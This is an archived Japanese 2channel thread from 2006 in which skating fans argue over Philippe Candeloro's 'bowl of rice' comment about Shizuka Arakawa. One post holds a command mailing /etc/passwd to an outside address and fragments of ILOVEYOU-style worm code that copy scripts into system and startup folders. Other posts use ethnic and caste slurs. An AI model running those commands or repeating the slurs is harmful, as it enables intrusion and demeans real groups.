2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

フィリップ・キャンデロロを語りたい人集まれ!2

1 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:05:52 ID:bQ7fHi/u0
リレハンメル・長野オリンピック銅メダリストにして生粋のエンターティナー、
フィリップ・キャンデロロとその人格について語ろう

フィリップ・キャンデロロを語りたい人集まれ!
http://ex12.2ch.net/test/read.cgi/skate/1142430640/
フィリップ・キャンデロロ知ってる人集まれ!
http://ex12.2ch.net/test/read.cgi/skate/1134742202/l50
フィリップ・キャンデロロ好きな人集まれ!
http://ex12.2ch.net/test/read.cgi/skate/1137250531/

このスレはsage進行です
荒らしは華麗にスルーしましょう

荒川へのコメントで謝罪「ご飯一杯の価値」
http://ex12.2ch.net/test/read.cgi/skate/1142456440/
【フィギュア】荒川静香の演技を「1杯のご飯程度」と評したキャンデロロ氏の発言を仏公共テレビが謝罪
http://news18.2ch.net/test/read.cgi/mnewsplus/1142412457/
【国際】 「荒川の演技=1杯のご飯程度」発言で、仏公共テレビが謝罪★2
http://news19.2ch.net/test/read.cgi/newsplus/1142422554/

2 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:06:36 ID:KO3NPcrZ0
<前スレまでの集約的レス> 1

742 :名無し@自治スレでローカルルール検討中 :2006/04/07(金) 20:11:06 ID:OVZAK6Hc0
なんか勘違いしてません?
ここまで傷口を広げたのってロロファンのアボン達だよ。
良識ある人は、まあ差別発言だけど、それにいちいち大げさに反応するのも
バカバカしいし。。。でも、まあ差別的だっていうことはこの場で言っとくよ
っていうスタンスだったのに、
ヲタ達が
差別じゃないんです~
そんな人じゃないんですう~
このことで日本を嫌いにならないで~
とか、天文学的に的外れな反論レスをワーワーギャーギャーやったから、
良識のある人達まで、そこまで言うならきちんととことん、分からせてあげるよ
ってことになったんでしょ。
で、ばつが悪くなったヲタは、現在潜行中
っていうのが現況じゃね?

3 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:07:08 ID:KO3NPcrZ0
<前スレまでの集約的レス> 2

939 :名無し@自治スレでローカルルール検討中 :2006/04/16(日) 22:50:40 ID:BRrgUckX0
レスも900を越えそろそろお蔵入りですね
ここまでヲタがかんぷ無きまでに論破されて
終結するレスはスケ板では珍しいですね
一因は、もちろんご飯だけど
アンチでもヲタでもないスケートファンが(私を含めて)
ロロファン叩きにまわったという事実は今回否定できないとおもいます
その要因としてやはりロロファンのマナーの悪さが挙げられるはずです
エキシやショーでいい加減な滑べりをしてもロロファンって
やみくもに声援というか嬌声を贈っちゃいますね
他の観客のことを考えず、執拗にアンコールをリクエストしたり……
私達からすれば決して安くはないチケットを買って
一流のパーフォーマンスを見にきたわけですから
そんないい加減な滑べりをする人はさっさと退場してもらって
次の人の滑べり、もっと丁寧に日本の観客を大事にしてくれる
スケーターのパフォーマンスを堪能したいんです
他のスケーターのときの観戦マナーやトイレの使い方もひどいです
何回かこのスレでで出ていましたが、何か言われたらただ闇雲に反発するんじゃなくて
ロロファンの人達は一度、自分達がどれだけまわりに迷惑かけたか
おのおの考えて欲しいです
これは、あおりでも釣りでもなく、スケートファンの本音です
心の中で反省してくれればそれでいいので、リアクションは不要です

4 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:07:49 ID:KO3NPcrZ0
<ロロのDQN発言集>

9 :名無し@自治スレでローカルルール検討中 :2006/03/15(水) 22:55:48 ID:NvgYbIWQ0
ロロのDQN発言集♪

・真央はノービスに戻った方がいい
・この採点はおかしい、コーエンの方が↑だ>真央のエリック
・荒川の演技には情熱を感じない
・このJAPは金取って米一粒喰えるw
・高橋五輪、ソーヤーの方が上のはず

5 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:08:22 ID:KO3NPcrZ0
「ロロヲタ天文学」の特徴

・差別は「悪いこと」と思い込んでいる。
・なぜ悪いのかは考えたことがない。
・親の言うとおりに生きてきた。
・マルコムXの偉大さが理解できない。

・「情報があれば正しい判断ができる」 と思い込んでいる。
 (これが足かせとなって自分の内面を見ることができない)

・本を読むと頭がよくなった気がする。
・ネット検索すると頭がよくなった気がする。

・「トンチンカン」の意味が分からない。

・「対立はよくない」と思い込んでいる。 (徳川時代の影響)
・「2者が対立する場合、どちらか一方に付かなければならない」
 と思い込んでいる。 (これも徳川時代の影響)

・欧米人にペコペコしている自分に気づかない。
・だが「ペコペコは良くない」と、うっすら気付いているw (←ここにジレンマが発生)

・この「ジレンマ」のせいで、論理が破綻してしまう。
 (あとはギャーギャーわめくしかない)

6 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:09:13 ID:KO3NPcrZ0
<資料>1-1:
荒川へのコメントで謝罪「ご飯一杯の価値」
http://ex12.2ch.net/test/read.cgi/skate/1142456440/112-116
より抜粋。

112 :名無し@自治スレでローカルルール検討中 :2006/04/02(日) 22:07:48 ID:kHSQpHqv0
Je pense qu'elle aura merite un bon bolle de riz ce soir !
どこまでロロが深く考えていたかはおいておくとしても。
ロロの発言の差別性はこの掲示板で指摘されているより遙かに深いものだ。
bon bol de rizは、単なるbol de riz(一杯の米飯)とは違うし、
bon(good、よい)がつくから褒め言葉というのも間違い。
bonがあるからかえって「まともな食事」というような意味になる。
(言ってみれば最低階層の人のなんとかちゃんとした食事)
un bon bol de rizの使用例
ttp://www.camilliani.org/stmissioni/fr/In_Cina.htm
Nous voulons que tous aient un champ, une maison, un habillement d残ent et un bon bol de riz.
皆が、土地、家、まともな着るもの、ちゃんとした食事を手に入れられることを望む。
こういうニュアンス。

単に「彼女はご飯を食べるでしょう」というのではなく、
merite(値する、褒美を受ける権利がある)という言葉を
使った点も曲者。
merite bon bol de rizと一体になることで、
「頑張ったのでこれで彼女はまともな食事にありつけるでしょう」
みたいな意味になる。裏返せばうまく演技できてなかったら、
まともな食事ももらえなかったという意味。
現代日本人の感覚として、食べるに事欠くというのは
想像外だからピンとこないだろう。しかしフランス人には
通じる発言だからフランス人の中から抗議が起きた。
アジアに植民地を持っていたフランス人には、
アジア人に対するひとつのステレオタイプのイメージがある。
(日本人の、サバンナとブッシュマンのアフリカみたいなイメージ)
植民地時代フランスの支配下で、炎天下一日中働かされ
食事時になると粗末な食べ物お椀に一杯分だけ
入れてもらって食べるアジア人のイメージである。
riz(米)自体にも一般には西洋では貧しいアジア人のイメージと
結びついている。(表現や言語はたがいに共通してもつ知識だから、
たとえ一部フランス人が健康食やおしゃれな流行として米を
食べるとしても、それは関係ない)

7 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:09:59 ID:KO3NPcrZ0
資料1-2 (つづき)

なんで飽食の国日本で、フィギュアのような金のかかる競技を
やっている選手にこんな表現が出るかと言う点に差別意識がある。
海外の掲示板(どこか忘れたけど)では、チャンピオンに対して、
芸をして餌をもらうペットのようにみなす表現が侮辱的という
ような正しく解釈した投書もあった。
試合の演技が良くても悪くても(食欲は別にして)
普通の食事がもらえないということはあり得ないし、
普通アスリートに対するご褒美としては賞やメダルなどの
精神的な名誉や賞賛であって、食べ物(それもご飯一杯)が褒美
というのは、猿回しの猿か奴隷並み。
褒めているようでいて、意地の悪い差別意識を背景にちらつかせた
表現で、おとしめている発言になっている。

生中継でべらべらしゃべっている間にとっさのことだから、
ロロはそこまできちんと「差別してやるぞ」なんて意気込んで
発言したわけではないのだろうが、
「アジア人が(白人の芸術をうまく吸収して)
よくやるじゃないか、今回は(白人の)欧米露が
アジア人に及ばないで(ふがいないけれど)
でもすばらしい演技だよ、ま、アジア人なんだけどね。」
みたいな屈折を、自分で持っていたか、もしくは
フランス人視聴者の中には持っている人が多いだろうと
無意識に思っていた。それで、アジア人としてはじめて
(アジア人のくせに)フィギュアで金メダルをとった荒川を、
フランス人視聴者にはわかる表現で、賞賛半分揶揄半分で
コメントしようとしたのではないか。
たぶん無意識に持っている差別意識がふいに出てしまったけれど、
さして特別な悪感情があるわけではないので、
荒川静香を傷つけたり嫌われたりしはしたくないから
適当に言いつくろって(日本人が的はずれな解釈しているのに乗 じ)
一生懸命謝罪したんだと思う。本当の差別主義者だったら謝らないし
差別的な意味をごまかそうともしないからね。
実際に、ロロ個人を責める必要なないし、ロロファンの人ががっかりすることもないんじゃないかな。この程度の内心の差別意識は
多くのヨーロッパ人が普通に持っている。
日本人だって、どの人種にもどの民族・国にも差別意識を全く
持たない人は少ない。

8 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:10:54 ID:KO3NPcrZ0
資料1-3 (つづき)
107の
もし、どうしても謝罪・釈明をしたいなら、
 発言の意味、そして謝罪・釈明する理由を、
 説明してからにしてはいかがですか」 
(理由なく謝罪・釈明することの無礼さを、匂わせる)
はその通りだけれど、
わざわざ日本人に「フランス人から見たらこういう深い
背景があって」とか、「実はフランス人はあなたがた
アジア人にこういうイメージを持っていて」
なんて言いたくないし、良心的な人ほど言うことがつらいから、
日本人に対してちゃんと説明する人が少ないんでしょう。
ロロも、荒川静香と面識があるんだし、これからも顔を合わす
ことになるんだから、そんなひどい発言の意図を
詳しく説明して謝罪するのははずかしいだろうし、
気がひけるだろう。

(「資料1」は以上)

9 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:11:48 ID:KO3NPcrZ0
<資料>2-1:
荒川へのコメントで謝罪「ご飯一杯の価値」
http://ex12.2ch.net/test/read.cgi/skate/1142456440/153-158
より抜粋。

153 :名無し@自治スレでローカルルール検討中 :2006/04/13(木) 23:31:32 ID:7H3ppMG/0
112-116ですが、戻ってきました。

最初に謝罪したのは、フランス国営テレビで、
いわばフランスの文化・社会・フランス語の専門家(つまり本当の意味でのインテリ)集団ということになるのだが、
彼らが、差別発言であるかと判断した重みを考えてほしい。

私はロロ発言を明白な差別発言だと思うが、
違うと主張している人たちは、
私の語学力や判断力など信用しなくてもいいが、
フランス本家のジャーナリスト集団のテレビ局の判断も
疑わしいと言うのだろうか。

>>151
「先走って謝罪してしまった」などということがあり得るか
よく考えてほしい。
もしも差別発言でないものを差別発言であるといったとしたら、
逆に発言者ロロの名誉を不当に激しく傷つけることになるので、
軽はずみには謝罪するわけがない。
また、本当にぬれぎぬであったなら、西洋人の権利感覚として、
ロロは荒川にいいわけするより、テレビ局に抗議したであろう。
西洋では相手を「人種差別者」ということは
最大級の悪口のひとつである。

また、フランス国営テレビも政府機関ではないが公営性が高い組織で、
それが日本国政府代表の大使館に謝罪するのだから、
もしも誤解の先走りで謝罪すれば、なんで不必要に日本に対する
負い目を負って、フランス人全体の名誉を汚すのかという点で
逆にフランス人の間で大問題になる。
(しかしなっていない。それだけ差別性は明白だから。)
しかも文書で謝罪するのは口頭の謝罪と違い非常に正式度が高い。

10 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:12:48 ID:KO3NPcrZ0
資料2-2 (つづき)

155 :名無し@自治スレでローカルルール検討中 :2006/04/13(木) 23:36:52 ID:7H3ppMG/0
また、一部の人は、日本に詳しいロロの発言が
日本文化を知らないフランステレビ局や一般のフランス人に
誤解されたというように主張しているようだが、
ロロの発言は、フランス国営テレビ放送でフランス人視聴者
に向けた番組中であったことを思い出してほしい。
聞き手が一般フランス人とわかっているのに
彼らの理解に合わせない発言をコメンテーターとしてするだろうか。
ロロは、まさにフランス人にわかる表現で
フランス人にうけるだろう(とロロが思っていた)内容
つまりアジア人揶揄をした。


156 :名無し@自治スレでローカルルール検討中 :2006/04/13(木) 23:40:42 ID:7H3ppMG/0
ロロは日本通(赤飯の知識)をひけらかしたかったのだなどとは、
私はそれこそ「噴飯もの」の説ではと思うが、
仮にロロがその意図であったなら、
「日本では、お米をお祝いに食べる習慣があるのですが、
きっと今夜彼女は・・・」というように、必ず一般フランス人にも
わかるように前置きの説明するはずである。
ましてや金芽米にひっかけたかったのなら、
普通のフランス人など絶対にこの話を知らないだろうから、
(実際はロロも知らなかったろうが)
必ず、「彼女は日本でお米のCMに出ているんですよ。
だから、今夜はお米を一杯食べるでしょうね」と言った..
(としたら実際、なんておもしろくない発言だ...)。
フランス人はウィットも重視するから、こんな間抜け発言したら馬鹿では。

11 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:13:42 ID:KO3NPcrZ0
資料2-3 (つづき)

157 :名無し@自治スレでローカルルール検討中 :2006/04/13(木) 23:42:50 ID:7H3ppMG/0
フランス人の雄弁さ(言語で的確に伝えたいことを伝える力)は
どういうわけか心憎いばかりで、日本人によくある舌足らず・
的はずれ・意味不明発言はフランス人には非常に少ない。
だいたい普通の会話でも日本では意味不明発言は聞き流されるが、
フランス人は意味不明だと必ず追求してくる。
それだけにあやふやな発言は自らも避ける。
人種揶揄の発言は刺激的で、ロロは受け狙いで言ったのだろう。
受ける代わりに非難をあびたのは、読みがはずれた。
実際のフランス大衆は、ロロの予想より良心的
(または良心的にふるまいたいと願っていた)。
実はロロの差別発言がピンとくるだけに、それがフランス人が
基本的に恥ずべきものと思っている植民地支配という歴史
からくるだけに、怒りを招くのだ。
日本の政治家も受け狙いで変な発言して叩かれる人がいるが。

158 :名無し@自治スレでローカルルール検討中 :2006/04/14(金) 00:26:58 ID:jjpCY2n30
>>157
>普通の会話でも日本では意味不明発言は聞き流されるが、
>フランス人は意味不明だと必ず追求してくる。

この西洋人の「言葉への厳しさ」は、
一般の日本人には想像さえできないだろう。
「聞き流す」なんてあり得ないし、意味を理解しても、
「なぜ?なぜ?なぜ?なぜ?」とどこまでも追求する。
(ユダヤキリスト教文化のせい)

フランス人はロロ発言を「聞き流さ」ないし、
厳しいフランス人に、ロロは釈明ができない。

「じゃ、日本人に適当に釈明しとけ。
 あいつらメチャクチャに言葉に鈍感だから」

12 :名無し@自治スレでローカルルール検討中:2006/04/18(火) 00:14:51 ID:KO3NPcrZ0
<現況>

ロロヲタによる「天文学的トンチンカンな反論」 が続行中。

差別じゃないんですう〜
ロロはそんな人じゃないんですう〜

13 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 08:33:39 ID:ou8w74X00
【詭弁のガイドライン】
1:事実に対して仮定を持ち出す
2:ごくまれな反例をとりあげる
3:自分に有利な将来像を予想する
4:主観で決め付ける
5:資料を示さず自論が支持されていると思わせる
6:一見関係ありそうで関係ない話を始める
7:陰謀であると力説する
8:知能障害を起こす
9:自分の見解を述べずに人格批判をする
10:ありえない解決策を図る
11:レッテル貼りをする
12:決着した話を経緯を無視して蒸し返す
13:勝利宣言をする
14:細かい部分のミスを指摘し相手を無知と認識させる
15:新しい概念が全て正しいのだとミスリードする

14 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 08:34:29 ID:ou8w74X00
【議論の問題点を淡々と検討・指摘できない人の行動パターン】

ラベリング型:発言内容を問うのではなく相手の姿勢そのものをレッテル貼り(ラベリング)することで、議論を一方的に誘導しようとする。
攻撃型:反論が目的であるかの如く、とにかく反論する。多くは言葉尻にのみ反応する。
宗教型:常識・人権・学会などの権威に依存していて、ある程度話を詰めると思考停止状態になる。
侮蔑型:様々な理由をつけてひたすら相手を蔑む。根拠不明の優越感を持っている。
一般化型:特殊な意見や個人的な価値観を敵性派閥全員が主張しているかのように一般化する。
単純型:釜茹でマンセーなど、深いことを考えていない単発の意見を書く。ネタの可能性大。
秘匿型:自分の意見を全く表明せず、安全地帯から他人の意見に茶々だけ入れて荒らす。
電波型:見当違いの会話や理論を押し付けてくる。突然逆ギレすることも。
分裂型:自ら上記のような手法を使うがそれは顧みず、他人が使ったときだけ鬼の首を取ったように責める。

15 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 10:32:16 ID:8TEvgjDo0



16 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 14:22:30 ID:lQc6U1WH0
このスレ意味わかんね


17 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 14:57:57 ID:j9ytMpJk0
スレたてしてくれた1以外はあらしの客だからね。
しばらく放置でいんじゃない?

18 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 18:07:52 ID:LMMRltKk0
ジュベに嫌われてるのね・・・

19 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 21:58:50 ID:XifxosLn0
2003ワシントンワールドでの面白エピソードが2つ印象に残った。

・ジョニは気持ち悪い。ランビはまだ好きじゃない
・イラク戦争開始の直後で、米仏の関係が最悪だった頃。
 フランスチームは必要以上にセキュリティーに神経を尖らせてピリピリしていた。
 予選終了後の夜に滞在先のホテル(ホワイトハウスの近所)でなぜか火災警報が鳴り響き、
 ジュベは同室のStannick Jeanetteと2人で「イラクの反撃か?俺たちは人質になるのか!?」と
 あらぬ想像に心乱されてパニクリまくり、朝まで一睡もできなかった・・・
 (ただし会場のお客さんからは何ら政治的敵意を感じなかった、とフォロー)

・自分のコーチが米記者から話しかけられているのを見て、
 その記者に「彼女は英語ができないんだよ」と英語で言おうと思ったのだが、間違って
 「彼女はアメリカ人とは話をしないんだよ」という意味のことを言ってしまい、超ヤバかった・・・
 
 一体どういう英語力やねんジュベw


20 :名無し@自治スレでローカルルール検討中:2006/04/20(木) 22:42:17 ID:XifxosLn0
・ランビの爆弾発言抜粋
プルには五輪には負けた。ただし…うーーん、やはり勝敗って言うのは運も関係あるだろ?
たまたまってことも。確かにプルは強い。今この段階でも負けるかも。でも僕はやるよ。
いつまでも上に入れないよ。年も関係あるし(一同唖然。キミーにしろランビにしろ少し
調子に乗ってない?)



21 :名無し@自治スレでローカルルール検討中:2006/04/21(金) 00:17:44 ID:96xKfinz0
まだやってたのか

22 :名無し@自治スレでローカルルール検討中:2006/04/22(土) 13:30:29 ID:wnlHf9tZ0
>>13>>14 ID:ou8w74X00
まだ泣いてたのか

23 :名無し@自治スレでローカルルール検討中:2006/04/22(土) 22:21:35 ID:Koz8CDr60
あーぁここもクソスレになったもんだな。
うざいから続きはVIPでも行ってやってくれよ。
あーうざいうざい。

24 :名無し@自治スレでローカルルール検討中:2006/04/22(土) 23:12:35 ID:wnlHf9tZ0
>>23
呂々ヲタ乙。 あいかわらずやり方が卑劣だね。卑怯の塊。

うざいなら無視すればいい。わざわざ書き込むな。

25 :名無し@自治スレでローカルルール検討中:2006/04/22(土) 23:58:58 ID:rr87sXpW0
呂ファン
1スレで負けた悔しさから、ストイコのスレ荒しはじめてるよ

26 :名無し@自治スレでローカルルール検討中:2006/04/23(日) 01:10:19 ID:RLzSd4qs0
>>25
ストイコのスレって何?
詳しく

27 :名無し@自治スレでローカルルール検討中:2006/04/23(日) 01:34:14 ID:ibhb6TVI0
ライーヨーのスレってオリンピック板のやつしか知らない(・∀・)ライーヨー!!

28 :名無し@自治スレでローカルルール検討中:2006/04/23(日) 02:55:11 ID:98B3IvpS0
学者の書く論文には、トンデモ「研究家」の書く文章のような口汚い罵倒は全くありません。
他人の説を批判する場合には、感情は一切排して、根拠を挙げて誤りを指摘するのが、論文の「作法」です。
批判は相手をへこませるのが目的なのではなく、相手の誤りを指摘して自分の見解を示し、
より正しい方向へと結論を導くためにするものです。
そのようにして初めて学問は発展していくのです。

感情的な罵倒は、何をも生み出さない不毛なものです。
まして相手の説とは無関係な人格攻撃が、
学問の発展にはいささかも寄与しない迷惑行為であることは言うまでもありません。
相手をあらゆる手段で叩きのめせば、「勝者」としての自分の株が上がると思っているのでしょうが、
そのような行為は良識ある人々を自分の周囲から遠ざけることになります。
学界では全く相手にされない鼻つまみ者になること必定です。

ttp://www.hmt.toyama-u.ac.jp/chubun/ohno/batou.htm

29 :名無し@自治スレでローカルルール検討中:2006/04/23(日) 03:02:56 ID:RLzSd4qs0
>>28 ←泣いてる人ってこの人?

30 :名無し@自治スレでローカルルール検討中:2006/04/24(月) 19:39:35 ID:iRTYcpzX0
ご飯の件で自分たちの擁護論が受けいれられなかったからって
なぜライーヨのスレを荒しに来るんでしょう?
ロロファンって不思議。
でもお分かりのとおり
私達のスレは技術的なこととかも含めて進行しているので
そういうことをしない(できない?)ロロファンの方たちが
荒しにきても誰も相手にしないから無駄ですよ
そう言うの徒労(とろう)っていうんですよ

31 :名無し@自治スレでローカルルール検討中:2006/04/24(月) 20:39:31 ID:G8qTskbb0
ジュベちゃんに馬鹿にされてるロロって、腐乱すでも馬鹿扱い?

32 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 02:47:44 ID:g1EekrEe0
ストイコのスレって覗いたこともないがロロファンって証拠あるの?
まあロロスレ自体久々に来たからなんとも言えんが。

33 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 03:49:12 ID:id3P2xhJ0
なんでライーヨスレが荒れるのかが分からんよ。
そのロロヲタは何しに行ってんだ?

34 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 04:07:34 ID:7+6UMtWu0
>>32>>33
ライーヨスレぜんぜん荒れてないよ。アンチの自演。

35 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 04:15:20 ID:J4HqQyLbO
アンチは在日の方々なんでしょ確か?どうせ単発IDでライーヨスレも荒らし始めるんだろ。
余り相手にしないほうがいいのかも。もともと日本人じゃないから価値観違う
わけだし、「勝った」と言いたきゃそう言わせときゃいい。
取りあえずみんなロロ以下の人生しか送れてないんだ、荒らしなんてさ。
あとみんな村主スレや荒川スレ住人くらい逞しく行こうぜ。

36 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 05:01:13 ID:OFJ/5JUz0
アンチは在日の方々なんでしょ確か?
www
ヲタはエタ部落だったっけ。

37 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 19:40:49 ID:vE3/Tx2j0
別に驚きませんよ
長野エキシのときでも呂ファンって自分勝手で
ライーヨーのスケーテインを楽しみに来てた人たちに
とって迷惑というか厄介者だったから‥…
相手にしてませんから
荒したければ荒して下さいよ、勝手に


38 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 19:58:45 ID:tcJ3CU650
>>34
だね。ロロスレの粘着=みどりスレの粘着(通称ドゲザ)
ヤツは自演するからね。あっさりバレてるけどw
http://ex12.2ch.net/test/read.cgi/skate/1142456440/261-267
http://ex12.2ch.net/test/read.cgi/skate/1144844058/39

39 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 22:21:54 ID:bjU+N7JY0
ストイコ選手って長野でエキシ滑ったっけ?
怪我して滑らなかったんじゃなかったっけ??

40 :名無し@自治スレでローカルルール検討中:2006/04/25(火) 23:15:07 ID:2XpR8M+R0
>>1
http://ex12.2ch.net/test/read.cgi/skate/1142456440/210




41 :名無し@自治スレでローカルルール検討中:2006/04/26(水) 19:41:06 ID:cVZdeZGb0
議論で負けて悔やしいからこのスレで泣きわめくのと
競技で負けて悔やしいからストイコスレを荒らすのは
いったいどんな関係があるんだ?
呂タ、説明してくれ


42 :名無し@自治スレでローカルルール検討中:2006/04/26(水) 21:20:29 ID:i9FLXuVb0
荒らしの心理なんて知らんのでとっととアク禁要請しておきなとしか言いようがない

43 :名無し@自治スレでローカルルール検討中:2006/04/26(水) 21:57:39 ID:yNe/mNtM0
>>41
「ロロヲタが荒らしてるな」とか書き込んで煽ろうとしたライーヨスレで
道端の犬フン並に無視されてるからってイライラするなよ。ww

44 :名無し@自治スレでローカルルール検討中:2006/04/26(水) 22:01:56 ID:8zrTrdC50
ロロン婆は更年期障害w

45 :名無し@自治スレでローカルルール検討中:2006/04/27(木) 03:29:17 ID:ru+wzerMO
ただの構ってちゃんだな。

46 :名無し@自治スレでローカルルール検討中:2006/04/27(木) 12:52:03 ID:1nZTrUSY0
いつ落としたのか、HDDから最後に金色のパンツだけになって滑ってる
エキシビジョンの動画がでてきたんだけど
これは、トリノのキャンデロロのエキシビジョン?
知ってる人いたら、教えてください。

47 :名無し@自治スレでローカルルール検討中:2006/04/28(金) 01:51:46 ID:Hp94qYPS0
>46
それってプルシェンコのSexBombだろ?

48 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 02:08:48 ID:iNI4Vs9P0
フィリップ・キャンデロロのファンと

新年の福袋で
ギャーギャー叫びながら売場に猛ダッシュし
店員の『買う前に袋の中身を出さないで下さい』も一切無視
まわりの女の髪の毛を引きずり倒して
福袋をゲットした迄は良かったが

特等の『八代亜紀があなたのペットの絵をかきます』を引いてしまい
一気に奈落の底につきおとされるオバサン


49 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 02:49:48 ID:wpqF31w1O
>>46
金パンツなんてプルしか思い付かんw
でもロロ金パンツ動画があったらうpヨロ

50 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 08:40:38 ID:fANhIOQo0
すげぇ!まだ荒らしてるんだ!!
粘着ここに極まれりだな


51 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 13:50:40 ID:gjdKCLSp0
そろそろ戻っても良い?

52 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 18:33:20 ID:/ovfzNJk0
戻りたいねぇ

53 :名無し@自治スレでローカルルール検討中:2006/04/29(土) 20:55:47 ID:yHVpK7HI0
戻りたいです

54 :名無し@自治スレでローカルルール検討中:2006/04/30(日) 01:38:47 ID:Mn0F5RtB0
バカニュース板に迷い込んだかと思った


55 :名無し@自治スレでローカルルール検討中:2006/04/30(日) 02:38:47 ID:RoNvWdgEO
戻りたいと言ってるのがリレ&長野メダリストのロロの演技について
話せる人なのか、孤独な奴がロロスレの反応する奴を頼りに「俺GW
でも悪口書くけど、構ってく下さい。臭いけど」っていう奴なのか
どっちかなのかが問題だ。

前者ならお帰りなさいm(_ _)m

後者ならまずスレ違いを理解して移動するか、カウンセリングをおすすめします。


56 :名無し@自治スレでローカルルール検討中:2006/04/30(日) 18:40:47 ID:R28pWUAU0
まだやってんのか
嫌いなら思い出したくも無いだろうに
わざわざ嫌いな奴を語りに来てたのしいか?

ここってもともとはロロが好きな奴が来てだべってた場所なんだから
くずどもは来ないで下さい。

57 :名無し@自治スレでローカルルール検討中:2006/04/30(日) 20:45:59 ID:RoNvWdgEO
>>56
レス良く読んでくれよ。あいつら自演がバレて引っ込み始めたんだから
もう戻れるってことです。ロロ好きはもう戻って来てよ。
構ってちゃんはいなくなりつつあるんだから。


58 :名無し@自治スレでローカルルール検討中:2006/05/01(月) 00:41:33 ID:9cKEIyIp0
じゃあそろそろ戻ろうか。
ゴッドファーザー4部作についてでも語る?

59 :57:2006/05/01(月) 07:49:50 ID:nzd7VnTQO
私はリレハンメルの頃8才だったから実はよく覚えて無いんです。
長野の時に94年の動画もらってあの両足ミョーンみたいな
ジャンプみて「あ!この人だ!(笑)」って思い出したんですけど詳しくは
無いんで、是非よろしくお願いします。ホント独創的な人ですね。


60 :新(名無しさん)募集中@自治スレ:2006/05/02(火) 00:07:25 ID:n+f4V4D30
内容の無いエキシだけはカンベン
まあ、それでも喜んじゃったフィギュアを知らない一部のファン
が甘やかして
結局我々全員がなめられちゃったのが問題なんだけど‥‥

61 :新(名無しさん)募集中@自治スレ:2006/05/03(水) 11:25:12 ID:eOMlbnnk0
ここsage推奨だからさ、せっかく落ち着きそうなんだから
ひっそりまた〜り行こうよ。

>59
両足ミョーンww
あのかえるとびっぽいアレだよね?
久しぶりにここで噴いたよ、ありがとうw

62 :新(名無しさん)募集中@自治スレ:2006/05/03(水) 11:28:53 ID:nCZ4K2ri0
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!


63 :新(名無しさん)募集中@自治スレ:2006/05/04(木) 21:30:05 ID:AGkbPaeJ0
ロロヲタって、みんなで泣いててお通夜みたいだね。

何かあったの?

64 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 01:44:24 ID:4vKkhtZZ0
ここにいなかっただけ。
何もなかったよ。

65 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 08:34:21 ID:w/f3KKNq0
>>63
自演厨乙

66 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 08:44:15 ID:qpkyt4Zk0
>>65 どうしてそうひねくれてるの?

みんなで泣いててお通夜みたいだね。
何かあったの?

67 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 08:47:13 ID:cEVvkeYSO
ネットで顔が見えるって病気だね。
荒らして無いで病院行きなよ、お母さん泣いてるよw

68 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 09:23:32 ID:qpkyt4Zk0
どうしてそうひねくれてるの?
みんなで泣いててお通夜みたいだけど、  何かあったの?

69 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 16:22:28 ID:Orenp86Q0
>>68
ドゲザがお通夜みたいに泣いてるね。
みどりスレ片っ端から追い出されたからって来られてもねえ・・・。

70 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 16:27:04 ID:qpkyt4Zk0
どうしてそうひねくれてるの?
みんなで泣いててお通夜みたいだけど、  
何かあったの?

71 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 19:52:22 ID:VqM2UBBe0
泣き虫なのかな?
それとも泣けば意見が通ると思ってるのかな?

どっちにしてもタチが悪いですね

72 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 20:49:58 ID:w/f3KKNq0
自分の発言で皆が泣いてると思ってるなんて、自意識過剰すぎw
早く病院行きなよ。

73 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 21:43:41 ID:cEVvkeYSO
というより荒らしがこういう手しか使えないと言うだけだが。


74 :新(名無しさん)募集中@自治スレ:2006/05/05(金) 23:29:06 ID:KYtl7zbk0
ロロ禿げちゃってるのか…だからあれほどひっつめ髪はやめろと

75 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 00:48:00 ID:ko3eS0TP0
